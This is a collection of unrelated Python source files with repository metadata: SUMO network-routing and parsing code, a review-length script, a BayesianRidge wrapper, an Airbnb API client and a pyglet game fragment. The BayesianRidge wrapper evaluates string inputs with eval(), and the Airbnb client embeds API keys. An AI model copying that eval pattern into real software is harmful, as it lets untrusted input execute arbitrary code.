x_off, y_off = self.getLocationOffset()
x -= x_off
y -= y_off
return self.getGeoProj()(x, y, inverse=True)
    def move(self, dx, dy, dz=0):
        """Translate all node coordinates and lane shapes by (dx, dy, dz)
        and rebuild the edge shapes afterwards."""
        for n in self._nodes:
            n._coord = (n._coord[0] + dx, n._coord[1] + dy, n._coord[2] + dz)
        for e in self._edges:
            for l in e._lanes:
                l._shape = [(p[0] + dx, p[1] + dy, p[2] + dz)
                            for p in l.getShape3D()]
            e.rebuildShape()
    def getInternalPath(self, conn, fastest=False):
        """Return (edges, cost) of the cheapest internal (via-lane) path among
        the given connections, or (None, inf) when none has a via lane."""
        minInternalCost = 1e400  # 1e400 overflows to float('inf')
        minPath = None
        for c in conn:
            if c.getViaLaneID() != "":
                viaCost = 0
                viaID = c.getViaLaneID()
                viaPath = []
                # follow the chain of internal lanes until it ends
                while viaID != "":
                    viaLane = self.getLane(viaID)
                    viaCost += viaLane.getLength() if not fastest else viaLane.getLength() / viaLane.getSpeed()
                    viaID = viaLane.getOutgoing()[0].getViaLaneID()
                    viaPath.append(viaLane.getEdge())
                if viaCost < minInternalCost:
                    minInternalCost = viaCost
                    minPath = viaPath
        return minPath, minInternalCost
    def getOptimalPath(self, fromEdge, toEdge, fastest=False, maxCost=1e400, vClass=None, reversalPenalty=0,
                       includeFromToCost=True, withInternal=False, ignoreDirection=False,
                       fromPos=0, toPos=0):
        """
        Finds the optimal (shortest or fastest) path for vClass from fromEdge to toEdge
        by using using Dijkstra's algorithm.
        It returns a pair of a tuple of edges and the cost.
        If no path is found the first element is None.
        The cost for the returned path is equal to the sum of all edge costs in the path,
        including the internal connectors, if they are present in the network.
        The path itself does not include internal edges except for the case
        when the start or end edge are internal edges.
        The search may be limited using the given threshold.
        """
        def speedFunc(edge):
            # cost divisor: edge speed for "fastest", 1.0 for "shortest"
            return edge.getSpeed() if fastest else 1.0
        if self.hasInternal:
            # strip trailing internal edges from the destination and remember
            # them (plus their cost) to re-append to the final result
            appendix = ()
            appendixCost = 0.
            while toEdge.getFunction() == "internal":
                appendix = (toEdge,) + appendix
                appendixCost += toEdge.getLength() / speedFunc(toEdge)
                toEdge = list(toEdge.getIncoming().keys())[0]
        fromCost = fromEdge.getLength() / speedFunc(fromEdge) if includeFromToCost else 0
        # heap entries: (cost, tie-break id, edges added by this step, path so far)
        q = [(fromCost, fromEdge.getID(), (fromEdge, ), ())]
        if fromEdge == toEdge and fromPos > toPos and not ignoreDirection:
            # start search on successors of fromEdge
            q = []
            startCost = (fromEdge.getLength() - fromPos) / speedFunc(fromEdge) if includeFromToCost else 0
            for e2, conn in fromEdge.getAllowedOutgoing(vClass).items():
                q.append((startCost + e2.getLength() / speedFunc(e2), e2.getID(), (fromEdge, e2), ()))
        seen = set()
        dist = {fromEdge: fromEdge.getLength() / speedFunc(fromEdge)}
        while q:
            cost, _, e1via, path = heapq.heappop(q)
            e1 = e1via[-1]
            if e1 in seen:
                continue
            seen.add(e1)
            path += e1via
            if e1 == toEdge:
                if self.hasInternal:
                    return path + appendix, cost + appendixCost
                if includeFromToCost and toPos == 0:
                    # assume toPos=0 is the default value
                    return path, cost
                return path, cost + (-toEdge.getLength() + toPos) / speedFunc(toEdge)
            if cost > maxCost:
                return None, cost
            for e2, conn in chain(e1.getAllowedOutgoing(vClass).items(),
                                  e1.getIncoming().items() if ignoreDirection else []):
                # print(cost, e1.getID(), e2.getID(), e2 in seen)
                if e2 not in seen:
                    newCost = cost + e2.getLength() / speedFunc(e2)
                    if e2 == e1.getBidi():
                        newCost += reversalPenalty
                    minPath = (e2,)
                    if self.hasInternal:
                        viaPath, minInternalCost = self.getInternalPath(conn, fastest=fastest)
                        if viaPath is not None:
                            newCost += minInternalCost
                            if withInternal:
                                minPath = tuple(viaPath + [e2])
                    if e2 not in dist or newCost < dist[e2]:
                        dist[e2] = newCost
                        heapq.heappush(q, (newCost, e2.getID(), minPath, path))
        return None, 1e400
    def getShortestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0,
                        includeFromToCost=True, withInternal=False, ignoreDirection=False,
                        fromPos=0, toPos=0):
        """
        Finds the shortest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm.
        It returns a pair of a tuple of edges and the cost. If no path is found the first element is None.
        The cost for the returned path is equal to the sum of all edge lengths in the path,
        including the internal connectors, if they are present in the network.
        The path itself does not include internal edges except for the case
        when the start or end edge are internal edges.
        The search may be limited using the given threshold.
        """
        # thin wrapper: delegates to getOptimalPath with fastest=False
        return self.getOptimalPath(fromEdge, toEdge, False, maxCost, vClass, reversalPenalty,
                                   includeFromToCost, withInternal, ignoreDirection, fromPos, toPos)
    def getFastestPath(self, fromEdge, toEdge, maxCost=1e400, vClass=None, reversalPenalty=0,
                       includeFromToCost=True, withInternal=False, ignoreDirection=False,
                       fromPos=0, toPos=0):
        """
        Finds the fastest path from fromEdge to toEdge respecting vClass, using Dijkstra's algorithm.
        It returns a pair of a tuple of edges and the cost. If no path is found the first element is None.
        The cost for the returned path is equal to the sum of all edge costs in the path,
        including the internal connectors, if they are present in the network.
        The path itself does not include internal edges except for the case
        when the start or end edge are internal edges.
        The search may be limited using the given threshold.
        """
        # thin wrapper: delegates to getOptimalPath with fastest=True
        return self.getOptimalPath(fromEdge, toEdge, True, maxCost, vClass, reversalPenalty,
                                   includeFromToCost, withInternal, ignoreDirection, fromPos, toPos)
class NetReader(handler.ContentHandler):
    """Reads a network, storing the edge geometries, lane numbers and max. speeds"""
    def __init__(self, **others):
        """Initialize parser state; options are passed as keyword arguments
        (see readNet for the supported keys)."""
        self._net = others.get('net', Net())
        # SAX state: the element currently being populated
        self._currentEdge = None
        self._currentNode = None
        self._currentConnection = None
        self._currentLane = None
        # crossing edge id -> ids of the edges it crosses (resolved in endDocument)
        self._crossingID2edgeIDs = {}
        self._withPhases = others.get('withPrograms', False)
        self._latestProgram = others.get('withLatestPrograms', False)
        if self._latestProgram:
            self._withPhases = True
        self._withConnections = others.get('withConnections', True)
        self._withFoes = others.get('withFoes', True)
        self._withPedestrianConnections = others.get('withPedestrianConnections', False)
        self._withMacroConnectors = others.get('withMacroConnectors', False)
        self._withInternal = others.get('withInternal', self._withPedestrianConnections)
        if self._withPedestrianConnections and not self._withInternal:
            sys.stderr.write("Warning: Option withPedestrianConnections requires withInternal\n")
            self._withInternal = True
        # edge id -> id of its bidi (opposite-direction) edge, resolved on </net>
        self._bidiEdgeIDs = {}
    def startElement(self, name, attrs):
        """SAX callback: dispatch on the element name and build up the net."""
        if name == 'location':
            self._net.setLocation(attrs["netOffset"], attrs["convBoundary"], attrs[
                "origBoundary"], attrs["projParameter"])
        if name == 'edge':
            function = attrs.get('function', '')
            if (function == ''
                    or (self._withInternal and function in ['internal', 'crossing', 'walkingarea'])
                    or (self._withMacroConnectors and function == 'connector')):
                prio = -1
                if 'priority' in attrs:
                    prio = int(attrs['priority'])
                # get the ids
                edgeID = attrs['id']
                fromNodeID = attrs.get('from', None)
                toNodeID = attrs.get('to', None)
                # for internal junctions use the junction's id for from and to node
                if function == 'internal':
                    fromNodeID = toNodeID = edgeID[1:edgeID.rfind('_')]
                # remember edges crossed by pedestrians to link them later to the crossing objects
                if function == 'crossing':
                    self._crossingID2edgeIDs[edgeID] = attrs.get('crossingEdges').split(' ')
                self._currentEdge = self._net.addEdge(edgeID, fromNodeID, toNodeID, prio, function,
                                                      attrs.get('name', ''), attrs.get('type', ''))
                self._currentEdge.setRawShape(convertShape(attrs.get('shape', '')))
                bidi = attrs.get('bidi', '')
                if bidi:
                    self._bidiEdgeIDs[edgeID] = bidi
            else:
                # edge is skipped; remember crossings/connectors so their
                # connections can be filtered out later
                if function in ['crossing', 'walkingarea']:
                    self._net._crossings_and_walkingAreas.add(attrs['id'])
                elif function == 'connector':
                    self._net._macroConnectors.add(attrs['id'])
                self._currentEdge = None
        if name == 'lane' and self._currentEdge is not None:
            self._currentLane = self._net.addLane(
                self._currentEdge,
                float(attrs['speed']),
                float(attrs['length']),
                float(attrs.get('width', 3.2)),
                attrs.get('allow'),
                attrs.get('disallow'))
            self._currentLane.setShape(convertShape(attrs.get('shape', '')))
        if name == 'neigh' and self._currentLane is not None:
            self._currentLane.setNeigh(attrs['lane'])
        if name == 'junction':
            # internal junctions (id starting with ':') are skipped
            if attrs['id'][0] != ':':
                intLanes = None
                if self._withInternal:
                    intLanes = attrs["intLanes"].split(" ")
                self._currentNode = self._net.addNode(attrs['id'], attrs['type'],
                                                      tuple(
                                                          map(float, [attrs['x'], attrs['y'],
                                                                      attrs['z'] if 'z' in attrs else '0'])),
                                                      attrs['incLanes'].split(" "), intLanes)
                self._currentNode.setShape(
                    convertShape(attrs.get('shape', '')))
                if 'fringe' in attrs:
                    self._currentNode._fringe = attrs['fringe']
        if name == 'succ' and self._withConnections:  # deprecated
            if attrs['edge'][0] != ':':
                self._currentEdge = self._net.getEdge(attrs['edge'])
                # NOTE: _currentLane is reused as an int lane index here
                # (deprecated file format)
                self._currentLane = attrs['lane']
                self._currentLane = int(
                    self._currentLane[self._currentLane.rfind('_') + 1:])
            else:
                self._currentEdge = None
        if name == 'succlane' and self._withConnections:  # deprecated
            lid = attrs['lane']
            if lid[0] != ':' and lid != "SUMO_NO_DESTINATION" and self._currentEdge:
                connected = self._net.getEdge(lid[:lid.rfind('_')])
                tolane = int(lid[lid.rfind('_') + 1:])
                if 'tl' in attrs and attrs['tl'] != "":
                    tl = attrs['tl']
                    tllink = int(attrs['linkIdx'])
                    tlid = attrs['tl']
                    toEdge = self._net.getEdge(lid[:lid.rfind('_')])
                    tolane2 = toEdge._lanes[tolane]
                    tls = self._net.addTLS(
                        tlid, self._currentEdge._lanes[self._currentLane], tolane2, tllink)
                    self._currentEdge.setTLS(tls)
                else:
                    tl = ""
                    tllink = -1
                toEdge = self._net.getEdge(lid[:lid.rfind('_')])
                tolane = toEdge._lanes[tolane]
                viaLaneID = attrs['via']
                self._net.addConnection(self._currentEdge, connected, self._currentEdge._lanes[
                    self._currentLane], tolane,
                    attrs['dir'], tl, tllink, attrs['state'], viaLaneID)
        if name == 'connection' and self._withConnections and (attrs['from'][0] != ":" or self._withInternal):
            fromEdgeID = attrs['from']
            toEdgeID = attrs['to']
            # skip connections to/from crossings and macro connectors unless
            # explicitly requested
            if ((self._withPedestrianConnections or not (fromEdgeID in self._net._crossings_and_walkingAreas or
                                                         toEdgeID in self._net._crossings_and_walkingAreas))
                    and (self._withMacroConnectors or not (fromEdgeID in self._net._macroConnectors or toEdgeID in
                                                           self._net._macroConnectors))):
                fromEdge = self._net.getEdge(fromEdgeID)
                toEdge = self._net.getEdge(toEdgeID)
                fromLane = fromEdge.getLane(int(attrs['fromLane']))
                toLane = toEdge.getLane(int(attrs['toLane']))
                if 'tl' in attrs and attrs['tl'] != "":
                    tl = attrs['tl']
                    tllink = int(attrs['linkIndex'])
                    tls = self._net.addTLS(tl, fromLane, toLane, tllink)
                    fromEdge.setTLS(tls)
                else:
                    tl = ""
                    tllink = -1
                try:
                    viaLaneID = attrs['via']
                except KeyError:
                    viaLaneID = ''
                self._currentConnection = self._net.addConnection(
                    fromEdge, toEdge, fromLane, toLane, attrs['dir'], tl,
                    tllink, attrs['state'], viaLaneID)
        # 'row-logic' is deprecated!!!
        if self._withFoes and name == 'ROWLogic':
            self._currentNode = attrs['id']
        if name == 'logicitem' and self._withFoes:  # deprecated
            self._net.setFoes(
                self._currentNode, int(attrs['request']), attrs["foes"], attrs["response"])
        if name == 'request' and self._withFoes:
            self._currentNode.setFoes(
                int(attrs['index']), attrs["foes"], attrs["response"])
        # tl-logic is deprecated!!! NOTE: nevertheless, this is still used by
        # netconvert... (Leo)
        if self._withPhases and name == 'tlLogic':
            self._currentProgram = self._net.addTLSProgram(
                attrs['id'], attrs['programID'], float(attrs['offset']), attrs['type'], self._latestProgram)
        if self._withPhases and name == 'phase':
            self._currentProgram.addPhase(
                attrs['state'], int(attrs['duration']),
                int(attrs['minDur']) if 'minDur' in attrs else -1,
                int(attrs['maxDur']) if 'maxDur' in attrs else -1,
                list(map(int, attrs['next'].split())) if 'next' in attrs else [],
                attrs['name'] if 'name' in attrs else ""
            )
        if name == 'roundabout':
            self._net.addRoundabout(
                attrs['nodes'].split(), attrs['edges'].split())
        if name == 'param':
            # attach the parameter to whichever element is currently open
            if self._currentLane is not None:
                self._currentLane.setParam(attrs['key'], attrs['value'])
            elif self._currentEdge is not None:
                self._currentEdge.setParam(attrs['key'], attrs['value'])
            elif self._currentNode is not None:
                self._currentNode.setParam(attrs['key'], attrs['value'])
            elif self._currentConnection is not None:
                self._currentConnection.setParam(attrs['key'], attrs['value'])
            elif self._withPhases and self._currentProgram is not None:
                # NOTE(review): _currentProgram is only assigned on 'tlLogic';
                # a top-level <param> before any tlLogic would raise
                # AttributeError here — confirm input files rule that out.
                self._currentProgram.setParam(attrs['key'], attrs['value'])
    def endElement(self, name):
        """SAX callback: clear per-element parser state."""
        if name == 'lane':
            self._currentLane = None
        if name == 'edge':
            self._currentEdge = None
        if name == 'junction':
            self._currentNode = None
        if name == 'connection':
            self._currentConnection = None
        # 'row-logic' is deprecated!!!
        if name == 'ROWLogic' or name == 'row-logic':
            self._haveROWLogic = False
        # tl-logic is deprecated!!!
        if self._withPhases and (name == 'tlLogic' or name == 'tl-logic'):
            self._currentProgram = None
        if name == 'net':
            # resolve bidi edge references now that all edges are known
            for edgeID, bidiID in self._bidiEdgeIDs.items():
                self._net.getEdge(edgeID)._bidi = self._net.getEdge(bidiID)
    def endDocument(self):
        """SAX callback: finalize cross-references after parsing."""
        # set crossed edges of pedestrian crossings
        for crossingID, crossedEdgeIDs in self._crossingID2edgeIDs.items():
            pedCrossing = self._net.getEdge(crossingID)
            for crossedEdgeID in crossedEdgeIDs:
                pedCrossing._addCrossingEdge(self._net.getEdge(crossedEdgeID))
    def getNet(self):
        """Return the parsed Net instance."""
        return self._net
def convertShape(shapeString):
    """ Convert xml shape string into float tuples.
    This method converts the 2d or 3d shape string from SUMO's xml file
    into a list containing 3d float-tuples. Non existant z coordinates default
    to zero. If shapeString is empty, an empty list will be returned.
    """
    points = []
    for token in shapeString.split():
        coords = tuple(float(part) for part in token.split(","))
        if len(coords) == 2:
            points.append(coords + (0.,))
        elif len(coords) == 3:
            points.append(coords)
        else:
            raise ValueError(
                'Invalid shape point "%s", should be either 2d or 3d' % token)
    return points
def readNet(filename, **others):
    """ load a .net.xml file
    The following named options are supported:
        'net' : initialize data structurs with an existing net object (default Net())
        'withPrograms' : import all traffic light programs (default False)
        'withLatestPrograms' : import only the last program for each traffic light.
                               This is the program that would be active in sumo by default.
                               (default False)
        'withConnections' : import all connections (default True)
        'withFoes' : import right-of-way information (default True)
        'withInternal' : import internal edges and lanes (default False)
        'withPedestrianConnections' : import connections between sidewalks, crossings (default False)
    """
    netreader = NetReader(**others)
    try:
        parse(gzip.open(filename), netreader)
    except IOError:
        # not gzip-compressed (or not readable as such): parse as plain XML
        parse(filename, netreader)
    return netreader.getNet()
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/sumolib/net/__init__.py
|
__init__.py
|
py
| 35,544 |
python
|
en
|
code
| 17 |
github-code
|
6
|
72345890107
|
# Read all reviews (one per line), printing a progress count every 1000 lines.
data = []
count = 0
with open('reviews.txt', 'r') as f:
    for line in f:
        data.append(line)
        count += 1
        if count % 1000 == 0:
            print(len(data))
print('Files finished reading, we have total', len(data), 'reviews')
# Average review length in characters. Guard against an empty file so the
# division cannot raise ZeroDivisionError (the previous version crashed there).
if data:
    sum_len = sum(len(d) for d in data)
    print('The average number of the reviews', sum_len / len(data))
else:
    print('The average number of the reviews', 0)
|
bealeebrandt/reviews-analytics
|
read.py
|
read.py
|
py
| 373 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27009702338
|
import numpy as np
import run as r
'''
[id]
115
[name]
BayesianRidge
[input]
x_train 训练集 训练集标签数据集 二维数组 必须 定数
y_train 测试集 测试集数据集 二维数组 必须 定数
x_test 训练集标签 训练集标签标签 一维数组 必须 定数
y_test 测试集标签 测试集标签 一维数组 必须 定数
n_iter n_iter 默认为300,最大迭代次数。应该大于或等于1,可选整数 整数 不必须 定数
tol tol 默认为1e-3,如果w收敛,则停止算法,可选浮点数 浮点数 不必须 定数
alpha_1 alpha_1 默认为1e-6,Hyper-parameter:shape参数,用于先于Alpha参数的Gamma分布,可选浮点数 浮点数 不必须 定数
alpha_2 alpha_2 默认为1e-6,超参数:Gamma分布优先于alpha参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数
lambda_1 lambda_1 默认为1e-6,Hyper-parameter:shape参数,用于先于lambda参数的Gamma分布,可选浮点数 浮点数 不必须 定数
lambda_2 lambda_2 默认为1e-6,超参数:Gamma分布先于lambda参数的反比例参数(速率参数),可选浮点数 浮点数 不必须 定数
alpha_init alpha_init 默认为None,alpha的初始值(噪声的精度)。如果未设置,则alpha_init为1/Var(y),可选浮点数 浮点数 不必须 定数
lambda_init lambda_init 默认为None,Lambda的初始值(权重的精度)。如果未设置,则lambda_init为1。..版本添加::0.22,可选浮点数 浮点数 不必须 定数
compute_score compute_score 默认为False,如果为True,则在每次优化迭代时计算对数边际可能性,可选布尔值 布尔值 不必须 定数
fit_intercept 计算截距 默认为True,是否计算此模型的截距。截距不被视为概率参数,因此没有关联的方差。如果将其设置为False,则在计算中将不使用截距(即,数据应居中),可选整数,布尔值 字符串 不必须 定数
normalize 归一化 默认为False,当fit_intercept设置为False时,将忽略此参数。如果为True,则将在回归之前通过减去均值并除以l2-范数来对回归变量X进行归一化,可选布尔值 布尔值 不必须 定数
copy_X 是否复制 默认为True,如果为True,将复制X;否则为X。否则,它可能会被覆盖,可选布尔值 布尔值 不必须 定数
verbose 详细程度 默认为False,拟合模型时为详细模式,可选布尔值 布尔值 不必须 定数
[output]
train_predict 预测 训练集预测结果 一维数组(数值)
test_predict 预测 测试集预测结果 一维数组(数值)
train_score 正确率 训练集预测结果的正确率 数字
test_score 正确率 测试集预测结果的正确率 数字
coef_ 参数向量 回归模型的系数(均值) 一维数组
intercept_ 截距 决策特征中的独立术语。如果fit_intercept=False,则设置为0.0 整数
alpha_ alpha 估计的噪声精度 浮点数
lambda_ lambda_ 估计重量的精度 浮点数
sigma_ sigma_ 权重的估计方差-协方差矩阵 二维数组
scores_ scores_ 如果calculated_score为True,则在每次优化迭代时对数边际似然值(要最大化)。该数组以从alpha和lambda的初始值获得的对数边际似然值开始,以以估计的alpha和lambda的值结束 一维数组
n_iter_ 迭代次数 达到停止标准的实际迭代次数 整数
[outline]
贝叶斯岭回归。
[describe]
贝叶斯岭回归。
拟合贝叶斯岭模型。
有关详细信息,请参见注释部分。
正则化参数的实现和优化lambda(权重的精度)和alpha(噪声的精度)
'''
def main(x_train, y_train, x_test, y_test,
         n_iter=300, tol=1.e-3, alpha_1=1.e-6, alpha_2=1.e-6, lambda_1=1.e-6, lambda_2=1.e-6, alpha_init=None,
         lambda_init=None, compute_score=False, fit_intercept=True, normalize=False, copy_X=True, verbose=False
         ):
    """Fit a BayesianRidge regression via r.run and return its result dict.

    Every parameter may also be passed as a string, in which case it is
    evaluated to a Python value first (this mirrors the original behaviour
    where each parameter had an identical `type(x) is str -> eval(x)` guard).
    """
    def _coerce(value):
        # SECURITY: eval() executes arbitrary code; only call this module
        # with trusted inputs. ast.literal_eval would be safer but would
        # reject some expressions the original accepted.
        return eval(value) if isinstance(value, str) else value
    x_train = _coerce(x_train)
    y_train = _coerce(y_train)
    x_test = _coerce(x_test)
    y_test = _coerce(y_test)
    n_iter = _coerce(n_iter)
    tol = _coerce(tol)
    alpha_1 = _coerce(alpha_1)
    alpha_2 = _coerce(alpha_2)
    lambda_1 = _coerce(lambda_1)
    lambda_2 = _coerce(lambda_2)
    alpha_init = _coerce(alpha_init)
    lambda_init = _coerce(lambda_init)
    compute_score = _coerce(compute_score)
    fit_intercept = _coerce(fit_intercept)
    normalize = _coerce(normalize)
    copy_X = _coerce(copy_X)
    verbose = _coerce(verbose)
    return r.run(x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test, n_iter=n_iter,
                 tol=tol,
                 alpha_1=alpha_1,
                 alpha_2=alpha_2,
                 lambda_1=lambda_1,
                 lambda_2=lambda_2,
                 alpha_init=alpha_init,
                 lambda_init=lambda_init,
                 compute_score=compute_score,
                 fit_intercept=fit_intercept,
                 normalize=normalize,
                 copy_X=copy_X,
                 verbose=verbose)
if __name__ == '__main__':
    import numpy as np
    import json
    # Smoke test: load a local CSV, keep the first 20 rows, use the last
    # column as the target and train/evaluate on the same data.
    array = np.loadtxt('D:\\123_2.csv', delimiter=',')
    array = array[0:20, :]
    y = array[:, -1].tolist()
    x = np.delete(array, -1, axis=1).tolist()
    array = array.tolist()
    back = main(x, y, x, y)
    print(back)
    for i in back:
        print(i + ":" + str(back[i]))
    json.dumps(back)
|
lisunshine1234/mlp-algorithm-python
|
machine_learning/regression/linear_models/BayesianRidge/main.py
|
main.py
|
py
| 5,830 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
38696958854
|
# coding=utf-8
import requests
class Airbnb(object):
    """Interface to get data from airbnb api. You can use :
    api_instance = Airbnb()
    api_instance.get_logement("Paris")
    api_instance.get_review(logement_id)
    api_instance.get_logement_details(logement_id)

    Every method returns the raw response body (bytes) on HTTP 200, and the
    numeric HTTP status code otherwise.
    """
    def get_user_infos(self, user_id):
        """Fetch the public profile of a user by id."""
        url = "https://api.airbnb.com/v2/users/%s?" % user_id
        params = {
            "client_id": "3092nxybyb0otqw18e8nh5nty",
            "_format": "v1_legacy_show",
            # NOTE(review): "en-Us" differs from the "en-US" casing used by
            # the other endpoints -- confirm it is intentional.
            "locale": "en-Us",
            "currency": "USD"
        }
        response = requests.get(url, params=params)
        if response.status_code != 200:
            return response.status_code
        return response.content
    def get_logement_details(self, logement_id):
        """Fetch the details of a single listing by id (str or int)."""
        # str() handles both str and int ids; replaces the previous
        # try/except TypeError around the string concatenation.
        url = "https://api.airbnb.com/v2/listings/" + str(logement_id)
        params = {
            "client_id": "3092nxybyb0otqw18e8nh5nty",  # compulsory : API KEY
            "_format": "v1_legacy_for_p3",  # compulsory
            "locale": "en-US",  # optionnal from here.
            "currency": "USD",
            "_source": "mobile_p3",
            "number_of_guests": "1"
        }
        response = requests.get(url, params=params)
        if response.status_code != 200:
            return response.status_code
        return response.content
    def get_review(self, logement_id, offset):
        """Fetch up to 50 reviews of a listing, starting at *offset*."""
        url = "https://api.airbnb.com/v2/reviews"
        params = {
            "client_id": "d306zoyjsyarp7ifhu67rjxn52tv0t20",
            "locale": "en-US",
            "currency": "USD",
            "_format": "for_mobile_client",
            "_limit": "50",
            "_offset": offset,
            "_order": "language",
            "listing_id": logement_id,
            "role": "all"
        }
        response = requests.get(url, params=params)
        if response.status_code != 200:
            print("response status code : %s" % response.status_code)
            return response.status_code
        return response.content
    def get_logement(self, city, checkin, checkout, offset):
        """With this function you can get lots of infos (especially the housing
        ID), then get data about reviews or details of it.
        The method take a city name (string) as input and return a
        utf-8 encoded json string you can easily parse with json.loads() or
        a HTTP status code if an error occured."""
        url = "https://api.airbnb.com/v2/search_results"
        # removed the unused local `key1` ("3092nxybyb0otqw18e8nh5nty");
        # only the second API key was ever sent.
        params = {
            "client_id": "d306zoyjsyarp7ifhu67rjxn52tv0t20",
            "locale": "en-US",
            "currency": "USD",
            "_limit": "50",
            "_format": "for_search_results_with_minimal_pricing",
            "_offset": offset,
            "fetch_facets": "true",
            "guests": "1",
            "ib": "false",
            "ib_add_photo_flow": "true",
            "location": city,
            "min_bathrooms": "0",
            "min_bedrooms": "0",
            "min_beds": "1",
            "min_num_pic_urls": "0",
            "price_max": "5000",
            "price_min": "0",
            "checkin": checkin,
            "checkout": checkout,
            "sort": "1",
            "user_lat": "37.3398634",
            "user_lng": "-122.0455164"
        }
        response = requests.get(url, params=params)
        if response.status_code != 200:
            return response.status_code
        return response.content
    def get_available(self, logement_id, month, year, count):
        """Endpoint to get all availability for a precise listing.
        We neede as input the listting id, month and year to begin from
        and count as number of months to get result from.
        It returns utf-8 encoded json string to parse with json.loads() or
        an HTTP status code if the request failed."""
        url = "https://www.airbnb.fr/api/v2/calendar_months"
        params = {
            "key": "d306zoyjsyarp7ifhu67rjxn52tv0t20",
            "currency": "EUR",
            "locale": "fr",
            "listing_id": logement_id,
            "month": month,
            "year": year,
            "count": count,
            "_format": "with_conditions"
        }
        response = requests.get(url, params=params)
        if response.status_code != 200:
            return response.status_code
        return response.content
    def get_logement_by_gps(self, ne_lat, ne_lng, sw_lat, sw_lng, zoom, page_number, checkin=None, checkout=None):
        """Search listings inside the GPS bounding box (ne/sw corners)."""
        url = "https://www.airbnb.fr/api/v2/explore_tabs"
        params = {
            "items_per_grid": "18",
            "key": "d306zoyjsyarp7ifhu67rjxn52tv0t20",
            "ne_lat": ne_lat,
            "ne_lng": ne_lng,
            "sw_lat": sw_lat,
            "sw_lng": sw_lng,
            "zoom": zoom,
            "location": "paris",
            "search_by_map": "true",
            "_format": "for_explore_search_web",
            "experiences_per_grid": "20",
            # FIX: key/value were malformed as "guidebooks_per_gri": "=20"
            # (the trailing 'd' of the key had slipped into the value).
            "guidebooks_per_grid": "20",
            "fetch_filters": "true",
            "supports_for_you_v3": "true",
            "screen_size": "large",
            "timezone_offset": "120",
            "auto_ib": "true",
            "tab_id": "home_tab",
            "federated_search_session_id": "87339300-cc93-4d01-b366-dc3896f7788b",
            "_intents": "p1",
            "currency": "EUR",
            "locale": "fr",
            "section_offset": page_number - 1
        }
        if checkin and checkout:
            params['checkin'] = checkin
            params['checkout'] = checkout
        response = requests.get(url, params=params)
        if response.status_code != 200:
            return response.status_code
        return response.content
if __name__ == '__main__':
    # get_review("17834617")
    airbnb = Airbnb()
    # ad-hoc smoke test: query listings inside a small GPS bounding box in Paris
    print(airbnb.get_logement_by_gps(48.8632953507299, 2.3455012817150873, 48.86068875819463, 2.3429478187329096, 18, 2))
    # print(airbnb.get_available(17834617, 5, 2017, 4))
    # print(airbnb.get_logement_details(17834617))
    # airbnb.get_logement("Bordeaux", 1, 2)
|
pablo-a/airbnb
|
airbnb_api.py
|
airbnb_api.py
|
py
| 6,552 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3200862039
|
def getOpCode(i):
    """Return the opcode encoded in the last two decimal digits of *i*.

    Instructions are non-negative integers, so modulo 100 is equivalent to
    taking the last two characters of the decimal representation.
    """
    return i % 100
def getParaModes(i):
    """Return the parameter-mode digits of instruction *i*, left-padded with
    zeros to at least two entries (modes[-1] is the first parameter's mode)."""
    modes = [int(digit) for digit in str(i)[:-2]]
    if len(modes) < 2:
        modes = [0] * (2 - len(modes)) + modes
    return modes
def getOperand(program, addr, mode):
    """Resolve the operand at *addr* using the given parameter mode.

    Mode 1 is immediate (the value at addr itself); any other mode is
    positional (the value at the address stored at addr). Returns None when
    either lookup falls outside the program.
    """
    try:
        return program[addr] if mode == 1 else program[program[addr]]
    except IndexError:
        return None
def execute(program):
    """Run the Intcode *program* (a list of ints) in place until opcode 99.

    Parameter modes: 0 = position, 1 = immediate; write targets are always
    treated as positions. Opcode 3 reads an integer interactively via
    input(); opcode 4 prints.
    """
    pc = 0
    while True:
        op_code = getOpCode(program[pc])
        modes = getParaModes(program[pc])
        # modes[-1]/modes[-2] are the modes of the first/second parameter
        op1 = getOperand(program, pc + 1, modes[-1])
        op2 = getOperand(program, pc + 2, modes[-2])
        if op_code == 99:
            return
        # Add
        if op_code == 1:
            program[program[pc + 3]] = op1 + op2
            pc += 4
            continue
        # Multiply
        if op_code == 2:
            program[program[pc + 3]] = op1 * op2
            pc += 4
            continue
        # Input
        if op_code == 3:
            x = input('Input a single integer: ')
            program[program[pc + 1]] = int(x)
            pc += 2
            continue
        # Output
        if op_code == 4:
            print(op1)
            pc += 2
            continue
        # Jump if true
        if op_code == 5:
            if op1 != 0:
                pc = op2
            else:
                pc += 3
            continue
        # Jump if false
        if op_code == 6:
            if op1 == 0:
                pc = op2
            else:
                pc += 3
            continue
        # Less than
        if op_code == 7:
            program[program[pc + 3]] = 1 if op1 < op2 else 0
            pc += 4
            continue
        # Equals
        if op_code == 8:
            program[program[pc + 3]] = 1 if op1 == op2 else 0
            pc += 4
            continue
def main():
    """Load the intcode program from input.txt and execute it.

    Fix: the original opened the file without closing it; 'with' releases
    the handle deterministically.
    """
    with open('input.txt') as program_file:
        program = [int(token) for token in program_file.read().split(',')]
    execute(program)


if __name__ == "__main__":
    main()
|
Sebastian-/advent-of-code-2019
|
day05/sol.py
|
sol.py
|
py
| 1,784 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73264632828
|
from game_objects.projectile import Projectile
from game_objects.player import Player
from pyglet import clock
from widgets.event_window import EventWindow
import pyglet
import cv2 as cv
import time
# Scene setup: a fullscreen window, the player sprite ("soul"), and one
# projectile aimed at it.
window = EventWindow(fullscreen=True)
# soul_image = pyglet.image.load('soul.png')
# soul = pyglet.sprite.Sprite(soul_image)
soul = Player(src='soul.png')
print(soul.width, soul.height)
print(window.width / 2, window.height / 2)
# Roughly center the soul (offset by its own width/height).
soul.move(window.width / 2 - soul.width, window.height / 2 - soul.height)
soul.scale = 1.3
print('Soul: ', soul.x, soul.y, soul.width, soul.height)
# NOTE(review): soul_np is never used below — presumably leftover from a
# pixel-level collision experiment; confirm before removing.
soul_np = cv.imread('soul.png')
projectile = Projectile(src='projectiles/dull_knife.png', speed=10, x=window.width * 0.7, y=window.height)
# projectile.x = window.width / 3
# projectile.rectangle.x = projectile.x
# projectile.y = window.height / 2
# projectile.rectangle.y = projectile.y
# Aim the projectile at the soul's current position.
projectile.point(soul.x, soul.y)
